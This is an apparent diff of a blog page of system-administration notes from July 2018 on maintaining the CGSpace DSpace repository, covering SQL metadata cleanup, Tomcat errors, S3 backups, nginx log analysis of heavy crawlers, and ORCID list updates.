<li>As the machine only has 8GB of RAM, I reduced the Tomcat memory heap from 5120m to 4096m so I could try to allocate more to the build process:</li>
</ul>
<pre><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx1024m&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m&#34;
$ mvn -U -Dmirage2.on=true -Dmirage2.deps.included=false -Denv=dspacetest.cgiar.org -P \!dspace-lni,\!dspace-rdf,\!dspace-sword,\!dspace-swordv2 clean package
</code></pre><ul>
<li>Then I stopped the Tomcat 7 service, ran the ant update, and manually ran the old and ignored SQL migrations:</li>
</ul>
<pre><code>$ sudo su - postgres
<pre tabindex="0"><code>$ sudo su - postgres
$ psql dspace
...
dspace=# begin;
@ -171,29 +171,29 @@ $ dspace database migrate ignored
</ul>
</li>
</ul>
<pre><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx1024m&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m&#34;
$ dspace metadata-import -e aorth@mjanja.ch -f /tmp/2018-06-27-New-CIFOR-Archive.csv
$ dspace metadata-import -e aorth@mjanja.ch -f /tmp/2018-06-27-New-CIFOR-Archive2.csv
</code></pre><ul>
<li>I noticed there are many items that use HTTP instead of HTTPS for their Google Books URL, and some missing HTTP entirely:</li>
</ul>
<pre><code>dspace=# select count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=222 and text_value like 'http://books.google.%';
<pre tabindex="0"><code>dspace=# select count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=222 and text_value like &#39;http://books.google.%&#39;;
count
-------
785
dspace=# select count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=222 and text_value ~ '^books\.google\..*';
dspace=# select count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=222 and text_value ~ &#39;^books\.google\..*&#39;;
count
-------
4
</code></pre><ul>
<li>I think I should fix that as well as some other garbage values like &ldquo;test&rdquo; and &ldquo;dspace.ilri.org&rdquo; etc:</li>
</ul>
<pre><code>dspace=# begin;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://books.google', 'https://books.google') where resource_type_id=2 and metadata_field_id=222 and text_value like 'http://books.google.%';
<pre tabindex="0"><code>dspace=# begin;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;http://books.google&#39;, &#39;https://books.google&#39;) where resource_type_id=2 and metadata_field_id=222 and text_value like &#39;http://books.google.%&#39;;
UPDATE 785
dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'books.google', 'https://books.google') where resource_type_id=2 and metadata_field_id=222 and text_value ~ '^books\.google\..*';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;books.google&#39;, &#39;https://books.google&#39;) where resource_type_id=2 and metadata_field_id=222 and text_value ~ &#39;^books\.google\..*&#39;;
UPDATE 4
dspace=# update metadatavalue set text_value='https://books.google.com/books?id=meF1CLdPSF4C' where resource_type_id=2 and metadata_field_id=222 and text_value='meF1CLdPSF4C';
dspace=# update metadatavalue set text_value=&#39;https://books.google.com/books?id=meF1CLdPSF4C&#39; where resource_type_id=2 and metadata_field_id=222 and text_value=&#39;meF1CLdPSF4C&#39;;
UPDATE 1
dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id=222 and metadata_value_id in (2299312, 10684, 10700, 996403);
DELETE 4
@ -201,8 +201,8 @@ dspace=# commit;
</code></pre><ul>
<li>Testing DSpace 5.8 with PostgreSQL 9.6 and Tomcat 8.5.32 (instead of my usual 7.0.88) and for some reason I get autowire errors on Catalina startup with 8.5.32:</li>
</ul>
<pre><code>03-Jul-2018 19:51:37.272 SEVERE [localhost-startStop-1] org.apache.catalina.core.StandardContext.listenerStart Exception sending context initialized event to listener instance of class [org.dspace.servicemanager.servlet.DSpaceKernelServletContextListener]
java.lang.RuntimeException: Failure during filter init: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name 'conversionService' defined in file [/home/aorth/dspace/config/spring/xmlui/spring-dspace-addon-cua-services.xml]: Cannot create inner bean 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#3f6c3e6a' of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter] while setting bean property 'converters' with key [1]; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#3f6c3e6a': Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter.filterConverter; nested exception is org.springframework.beans.factory.NoSuchBeanDefinitionException: No matching bean of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter] found for dependency: expected at least 1 bean which qualifies as autowire candidate for this dependency. Dependency annotations: {@org.springframework.beans.factory.annotation.Autowired(required=true)}
<pre tabindex="0"><code>03-Jul-2018 19:51:37.272 SEVERE [localhost-startStop-1] org.apache.catalina.core.StandardContext.listenerStart Exception sending context initialized event to listener instance of class [org.dspace.servicemanager.servlet.DSpaceKernelServletContextListener]
java.lang.RuntimeException: Failure during filter init: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name &#39;conversionService&#39; defined in file [/home/aorth/dspace/config/spring/xmlui/spring-dspace-addon-cua-services.xml]: Cannot create inner bean &#39;com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#3f6c3e6a&#39; of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter] while setting bean property &#39;converters&#39; with key [1]; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name &#39;com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#3f6c3e6a&#39;: Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter.filterConverter; nested exception is org.springframework.beans.factory.NoSuchBeanDefinitionException: No matching bean of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter] found for dependency: expected at least 1 bean which qualifies as autowire candidate for this dependency. Dependency annotations: {@org.springframework.beans.factory.annotation.Autowired(required=true)}
at org.dspace.servicemanager.servlet.DSpaceKernelServletContextListener.contextInitialized(DSpaceKernelServletContextListener.java:92)
at org.apache.catalina.core.StandardContext.listenerStart(StandardContext.java:4792)
at org.apache.catalina.core.StandardContext.startInternal(StandardContext.java:5256)
@ -217,7 +217,7 @@ dspace=# commit;
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
at java.lang.Thread.run(Thread.java:748)
Caused by: java.lang.RuntimeException: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name 'conversionService' defined in file [/home/aorth/dspace/config/spring/xmlui/spring-dspace-addon-cua-services.xml]: Cannot create inner bean 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#3f6c3e6a' of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter] while setting bean property 'converters' with key [1]; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#3f6c3e6a': Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter.filterConverter; nested exception is org.springframework.beans.factory.NoSuchBeanDefinitionException: No matching bean of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter] found for dependency: expected at least 1 bean which qualifies as autowire candidate for this dependency. Dependency annotations: {@org.springframework.beans.factory.annotation.Autowired(required=true)}
Caused by: java.lang.RuntimeException: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name &#39;conversionService&#39; defined in file [/home/aorth/dspace/config/spring/xmlui/spring-dspace-addon-cua-services.xml]: Cannot create inner bean &#39;com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#3f6c3e6a&#39; of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter] while setting bean property &#39;converters&#39; with key [1]; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name &#39;com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#3f6c3e6a&#39;: Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter.filterConverter; nested exception is org.springframework.beans.factory.NoSuchBeanDefinitionException: No matching bean of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter] found for dependency: expected at least 1 bean which qualifies as autowire candidate for this dependency. Dependency annotations: {@org.springframework.beans.factory.annotation.Autowired(required=true)}
</code></pre><ul>
<li>Gotta check that out later&hellip;</li>
</ul>
@ -241,7 +241,7 @@ Caused by: java.lang.RuntimeException: Failed to startup the DSpace Service Mana
<li>It looks like I added Solr to the <code>backup_to_s3.sh</code> script, but that script is not even being used (<code>s3cmd</code> is run directly from root&rsquo;s crontab)</li>
<li>For now I have just initiated a manual S3 backup of the Solr data:</li>
</ul>
<pre><code># s3cmd sync --delete-removed /home/backup/solr/ s3://cgspace.cgiar.org/solr/
<pre tabindex="0"><code># s3cmd sync --delete-removed /home/backup/solr/ s3://cgspace.cgiar.org/solr/
</code></pre><ul>
<li>But I need to add this to cron!</li>
<li>I wonder if I should convert some of the cron jobs to systemd services / timers&hellip;</li>
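<li>For the Solr S3 sync a systemd timer might look something like this (just a sketch, the unit names and the s3cmd path are made up and I haven&rsquo;t tested it):</li>
</ul>
<pre tabindex="0"><code># /etc/systemd/system/solr-s3-backup.service (hypothetical name)
[Unit]
Description=Sync Solr backups to S3

[Service]
Type=oneshot
ExecStart=/usr/bin/s3cmd sync --delete-removed /home/backup/solr/ s3://cgspace.cgiar.org/solr/

# /etc/systemd/system/solr-s3-backup.timer (hypothetical name)
[Unit]
Description=Run the Solr S3 backup daily

[Timer]
OnCalendar=daily
Persistent=true

[Install]
WantedBy=timers.target
</code></pre>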
@ -249,7 +249,7 @@ Caused by: java.lang.RuntimeException: Failed to startup the DSpace Service Mana
<li>Abenet wants to be able to search by journal title (dc.source) in the advanced Discovery search so I opened an issue for it (<a href="https://github.com/ilri/DSpace/issues/384">#384</a>)</li>
<li>I regenerated the list of names for all our ORCID iDs using my <a href="https://gist.github.com/alanorth/57a88379126d844563c1410bd7b8d12b">resolve-orcids.py</a> script:</li>
</ul>
<pre><code>$ grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml | sort | uniq &gt; /tmp/2018-07-08-orcids.txt
<pre tabindex="0"><code>$ grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml | sort | uniq &gt; /tmp/2018-07-08-orcids.txt
$ ./resolve-orcids.py -i /tmp/2018-07-08-orcids.txt -o /tmp/2018-07-08-names.txt -d
</code></pre><ul>
<li>But after comparing to the existing list of names I didn&rsquo;t see much change, so I just ignored it</li>
@ -259,22 +259,22 @@ $ ./resolve-orcids.py -i /tmp/2018-07-08-orcids.txt -o /tmp/2018-07-08-names.txt
<li>Uptime Robot said that CGSpace was down for two minutes early this morning but I don&rsquo;t see anything in Tomcat logs or dmesg</li>
<li>Uptime Robot said that CGSpace was down for two minutes again later in the day, and this time I saw a memory error in Tomcat&rsquo;s <code>catalina.out</code>:</li>
</ul>
<pre><code>Exception in thread &quot;http-bio-127.0.0.1-8081-exec-557&quot; java.lang.OutOfMemoryError: Java heap space
<pre tabindex="0"><code>Exception in thread &#34;http-bio-127.0.0.1-8081-exec-557&#34; java.lang.OutOfMemoryError: Java heap space
</code></pre><ul>
<li>I&rsquo;m not sure if it&rsquo;s the same error, but I see this in DSpace&rsquo;s <code>solr.log</code>:</li>
</ul>
<pre><code>2018-07-09 06:25:09,913 ERROR org.apache.solr.servlet.SolrDispatchFilter @ null:java.lang.RuntimeException: java.lang.OutOfMemoryError: Java heap space
<pre tabindex="0"><code>2018-07-09 06:25:09,913 ERROR org.apache.solr.servlet.SolrDispatchFilter @ null:java.lang.RuntimeException: java.lang.OutOfMemoryError: Java heap space
</code></pre><ul>
<li>I see a strange error around that time in <code>dspace.log.2018-07-08</code>:</li>
</ul>
<pre><code>2018-07-09 06:23:43,510 ERROR com.atmire.statistics.SolrLogThread @ IOException occured when talking to server at: http://localhost:8081/solr/statistics
<pre tabindex="0"><code>2018-07-09 06:23:43,510 ERROR com.atmire.statistics.SolrLogThread @ IOException occured when talking to server at: http://localhost:8081/solr/statistics
org.apache.solr.client.solrj.SolrServerException: IOException occured when talking to server at: http://localhost:8081/solr/statistics
</code></pre><ul>
<li>But not sure what caused that&hellip;</li>
<li>I got a message from Linode tonight that CPU usage was high on CGSpace for the past few hours around 8PM GMT</li>
<li>Looking in the nginx logs I see the top ten IP addresses active today:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;09/Jul/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;09/Jul/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
1691 40.77.167.84
1701 40.77.167.69
1718 50.116.102.77
@ -288,7 +288,7 @@ org.apache.solr.client.solrj.SolrServerException: IOException occured when talki
</code></pre><ul>
<li>Of those, <em>all</em> except <code>70.32.83.92</code> and <code>50.116.102.77</code> are <em>NOT</em> re-using their Tomcat sessions, for example from the XMLUI logs:</li>
</ul>
<pre><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=95.108.181.88' dspace.log.2018-07-09
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=95.108.181.88&#39; dspace.log.2018-07-09
4435
</code></pre><ul>
<li><code>95.108.181.88</code> appears to be Yandex, so I dunno why it&rsquo;s creating so many sessions, as its user agent should match Tomcat&rsquo;s Crawler Session Manager Valve</li>
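<li>For reference, the valve is configured in Tomcat&rsquo;s <code>server.xml</code> with something like this (an illustrative sketch, the user agent regex is an example rather than our exact config):</li>
</ul>
<pre tabindex="0"><code>&lt;!-- inside the &lt;Host&gt; element of Tomcat&#39;s server.xml --&gt;
&lt;Valve className=&#34;org.apache.catalina.valves.CrawlerSessionManagerValve&#34;
       crawlerUserAgents=&#34;.*[bB]ot.*|.*Yandex.*|.*[Ss]pider.*&#34; /&gt;
</code></pre>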
@ -314,7 +314,7 @@ org.apache.solr.client.solrj.SolrServerException: IOException occured when talki
<li>Linode sent an alert about CPU usage on CGSpace again, about 13:00UTC</li>
<li>These are the top ten users in the last two hours:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;10/Jul/2018:(11|12|13)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;10/Jul/2018:(11|12|13)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
81 193.95.22.113
82 50.116.102.77
112 40.77.167.90
@ -328,7 +328,7 @@ org.apache.solr.client.solrj.SolrServerException: IOException occured when talki
</code></pre><ul>
<li>Looks like <code>213.139.52.250</code> is Moayad testing his new CGSpace visualization thing:</li>
</ul>
<pre><code>213.139.52.250 - - [10/Jul/2018:13:39:41 +0000] &quot;GET /bitstream/handle/10568/75668/dryad.png HTTP/2.0&quot; 200 53750 &quot;http://localhost:4200/&quot; &quot;Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36&quot;
<pre tabindex="0"><code>213.139.52.250 - - [10/Jul/2018:13:39:41 +0000] &#34;GET /bitstream/handle/10568/75668/dryad.png HTTP/2.0&#34; 200 53750 &#34;http://localhost:4200/&#34; &#34;Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36&#34;
</code></pre><ul>
<li>He said there was a bug that caused his app to request a bunch of invalid URLs</li>
<li>I&rsquo;ll have to keep an eye on this and see how their platform evolves</li>
@ -349,7 +349,7 @@ org.apache.solr.client.solrj.SolrServerException: IOException occured when talki
<li>Uptime Robot said that CGSpace went down a few times last night, around 10:45 PM and 12:30 AM</li>
<li>Here are the top ten IPs from last night and this morning:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;11/Jul/2018:22&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;11/Jul/2018:22&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
48 66.249.64.91
50 35.227.26.162
57 157.55.39.234
@ -360,7 +360,7 @@ org.apache.solr.client.solrj.SolrServerException: IOException occured when talki
97 183.128.40.185
97 240e:f0:44:fa53:745a:8afe:d221:1232
3634 208.110.72.10
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;12/Jul/2018:00&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;12/Jul/2018:00&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
25 216.244.66.198
38 40.77.167.185
46 66.249.64.93
@ -377,27 +377,27 @@ org.apache.solr.client.solrj.SolrServerException: IOException occured when talki
<li>A brief Google search doesn&rsquo;t turn up any information about what this bot is, but lots of users are complaining about it</li>
<li>This bot does make a lot of requests all through the day, although it seems to re-use its Tomcat session:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;Pcore-HTTP&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;Pcore-HTTP&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
17098 208.110.72.10
# grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=208.110.72.10' dspace.log.2018-07-11
# grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=208.110.72.10&#39; dspace.log.2018-07-11
1161
# grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=208.110.72.10' dspace.log.2018-07-12
# grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=208.110.72.10&#39; dspace.log.2018-07-12
1885
</code></pre><ul>
<li>I think the problem is that, despite the bot requesting <code>robots.txt</code>, it almost exclusively requests dynamic pages from <code>/discover</code>:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;Pcore-HTTP&quot; | grep -o -E &quot;GET /(browse|discover|search-filter)&quot; | sort -n | uniq -c | sort -rn
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;Pcore-HTTP&#34; | grep -o -E &#34;GET /(browse|discover|search-filter)&#34; | sort -n | uniq -c | sort -rn
13364 GET /discover
993 GET /search-filter
804 GET /browse
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;Pcore-HTTP&quot; | grep robots
208.110.72.10 - - [12/Jul/2018:00:22:28 +0000] &quot;GET /robots.txt HTTP/1.1&quot; 200 1301 &quot;https://cgspace.cgiar.org/robots.txt&quot; &quot;Pcore-HTTP/v0.44.0&quot;
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;Pcore-HTTP&#34; | grep robots
208.110.72.10 - - [12/Jul/2018:00:22:28 +0000] &#34;GET /robots.txt HTTP/1.1&#34; 200 1301 &#34;https://cgspace.cgiar.org/robots.txt&#34; &#34;Pcore-HTTP/v0.44.0&#34;
</code></pre><ul>
<li>So this bot is just like Baiduspider, and I need to add it to the nginx rate limiting</li>
<li>I&rsquo;ll also add it to Tomcat&rsquo;s Crawler Session Manager Valve to force the re-use of a common Tomcat session for all crawlers just in case</li>
<li>Generate a list of all affiliations in CGSpace to send to Mohamed Salem to compare with the list on MEL (sorting the list by most occurrences):</li>
</ul>
<pre><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where resource_type_id=2 and metadata_field_id=211 group by text_value order by count desc) to /tmp/affiliations.csv with csv header
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where resource_type_id=2 and metadata_field_id=211 group by text_value order by count desc) to /tmp/affiliations.csv with csv header
COPY 4518
dspace=# \q
$ csvcut -c 1 &lt; /tmp/affiliations.csv &gt; /tmp/affiliations-1.csv
@ -408,7 +408,7 @@ $ csvcut -c 1 &lt; /tmp/affiliations.csv &gt; /tmp/affiliations-1.csv
<ul>
<li>Generate a list of affiliations for Peter and Abenet to go over so we can batch correct them before we deploy the new data visualization dashboard:</li>
</ul>
<pre><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'affiliation') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/affiliations.csv with csv header;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;affiliation&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/affiliations.csv with csv header;
COPY 4518
</code></pre><h2 id="2018-07-15">2018-07-15</h2>
<ul>
@ -420,7 +420,7 @@ COPY 4518
<li>Altmetric help said that <a href="https://cgspace.cgiar.org/oai/request?verb=GetRecord&amp;metadataPrefix=oai_dc&amp;identifier=oai:cgspace.cgiar.org:10568/82810">according to OAI that item is only in one department</a></li>
<li>I noticed that indeed there was only one collection listed, so I forced an OAI re-import on CGSpace:</li>
</ul>
<pre><code>$ dspace oai import -c
<pre tabindex="0"><code>$ dspace oai import -c
OAI 2.0 manager action started
Clearing index
Index cleared
@ -438,19 +438,19 @@ OAI 2.0 manager action ended. It took 697 seconds.
<li>I need to ask the dspace-tech mailing list if the nightly OAI import catches the case of old items that have had metadata or mappings change</li>
<li>ICARDA sent me a list of the ORCID iDs they have in the MEL system and it looks like almost 150 are new and unique to us!</li>
</ul>
<pre><code>$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq | wc -l
<pre tabindex="0"><code>$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq | wc -l
1020
$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml MEL\ ORCID.json | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq | wc -l
$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml MEL\ ORCID.json | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq | wc -l
1158
</code></pre><ul>
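<li>That works out to roughly 138 identifiers we don&rsquo;t have yet:</li>
</ul>
<pre><code>$ echo $((1158 - 1020))
138
</code></pre><ul>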
<li>I combined the two lists and regenerated the names for all of our ORCID iDs using my <a href="https://gist.github.com/alanorth/57a88379126d844563c1410bd7b8d12b">resolve-orcids.py</a> script:</li>
</ul>
<pre><code>$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml MEL\ ORCID.json | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq &gt; /tmp/2018-07-15-orcid-ids.txt
<pre tabindex="0"><code>$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml MEL\ ORCID.json | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq &gt; /tmp/2018-07-15-orcid-ids.txt
$ ./resolve-orcids.py -i /tmp/2018-07-15-orcid-ids.txt -o /tmp/2018-07-15-resolved-orcids.txt -d
</code></pre><ul>
<li>Then I added the XML formatting for controlled vocabularies, sorted the list with GNU sort in vim via <code>% !sort</code> and then checked the formatting with tidy:</li>
</ul>
<pre><code>$ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
<pre tabindex="0"><code>$ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
</code></pre><ul>
<li>I will check with the CGSpace team to see if they want me to add these to CGSpace</li>
<li>Help Udana from WLE understand some Altmetrics concepts</li>
@ -465,16 +465,16 @@ $ ./resolve-orcids.py -i /tmp/2018-07-15-orcid-ids.txt -o /tmp/2018-07-15-resolv
<li>For every day in the past week I only see about 50 to 100 requests per day, but then about nine days ago I see 1500 requests</li>
<li>In there I see two bots making about 750 requests each, and this one is probably Altmetric:</li>
</ul>
<pre><code>178.33.237.157 - - [09/Jul/2018:17:00:46 +0000] &quot;GET /oai/request?verb=ListRecords&amp;resumptionToken=oai_dc////100 HTTP/1.1&quot; 200 58653 &quot;-&quot; &quot;Apache-HttpClient/4.5.2 (Java/1.8.0_121)&quot;
178.33.237.157 - - [09/Jul/2018:17:01:11 +0000] &quot;GET /oai/request?verb=ListRecords&amp;resumptionToken=oai_dc////200 HTTP/1.1&quot; 200 67950 &quot;-&quot; &quot;Apache-HttpClient/4.5.2 (Java/1.8.0_121)&quot;
<pre tabindex="0"><code>178.33.237.157 - - [09/Jul/2018:17:00:46 +0000] &#34;GET /oai/request?verb=ListRecords&amp;resumptionToken=oai_dc////100 HTTP/1.1&#34; 200 58653 &#34;-&#34; &#34;Apache-HttpClient/4.5.2 (Java/1.8.0_121)&#34;
178.33.237.157 - - [09/Jul/2018:17:01:11 +0000] &#34;GET /oai/request?verb=ListRecords&amp;resumptionToken=oai_dc////200 HTTP/1.1&#34; 200 67950 &#34;-&#34; &#34;Apache-HttpClient/4.5.2 (Java/1.8.0_121)&#34;
...
178.33.237.157 - - [09/Jul/2018:22:10:39 +0000] &quot;GET /oai/request?verb=ListRecords&amp;resumptionToken=oai_dc////73900 HTTP/1.1&quot; 200 25049 &quot;-&quot; &quot;Apache-HttpClient/4.5.2 (Java/1.8.0_121)&quot;
178.33.237.157 - - [09/Jul/2018:22:10:39 +0000] &#34;GET /oai/request?verb=ListRecords&amp;resumptionToken=oai_dc////73900 HTTP/1.1&#34; 200 25049 &#34;-&#34; &#34;Apache-HttpClient/4.5.2 (Java/1.8.0_121)&#34;
</code></pre><ul>
<li>So if they are getting 100 records per OAI request it would take them 739 requests</li>
<li>I wonder if I should add this user agent to the Tomcat Crawler Session Manager valve&hellip; does OAI use Tomcat sessions?</li>
<li>Appears not:</li>
</ul>
<pre><code>$ http --print Hh 'https://cgspace.cgiar.org/oai/request?verb=ListRecords&amp;resumptionToken=oai_dc////100'
<pre tabindex="0"><code>$ http --print Hh &#39;https://cgspace.cgiar.org/oai/request?verb=ListRecords&amp;resumptionToken=oai_dc////100&#39;
GET /oai/request?verb=ListRecords&amp;resumptionToken=oai_dc////100 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
@ -511,7 +511,7 @@ X-XSS-Protection: 1; mode=block
<li>They say that it is a burden for them to capture the issue dates, so I cautioned them that this is for their own benefit and for posterity, and that everyone else on CGSpace manages to capture the issue dates!</li>
<li>For future reference, as I had previously noted in <a href="/cgspace-notes/2018-04/">2018-04</a>, sort options are configured in <code>dspace.cfg</code>, for example:</li>
</ul>
<pre><code>webui.itemlist.sort-option.3 = dateaccessioned:dc.date.accessioned:date
<pre tabindex="0"><code>webui.itemlist.sort-option.3 = dateaccessioned:dc.date.accessioned:date
</code></pre><ul>
<li>Just because I was curious I made sure that these options are working as expected in DSpace 5.8 on DSpace Test (they are)</li>
<li>I tested the Atmire Listings and Reports (L&amp;R) module one last time on my local test environment with a new snapshot of CGSpace&rsquo;s database and re-generated Discovery index and it worked fine</li>
@ -523,17 +523,17 @@ X-XSS-Protection: 1; mode=block
<li>Still discussing dates with IWMI</li>
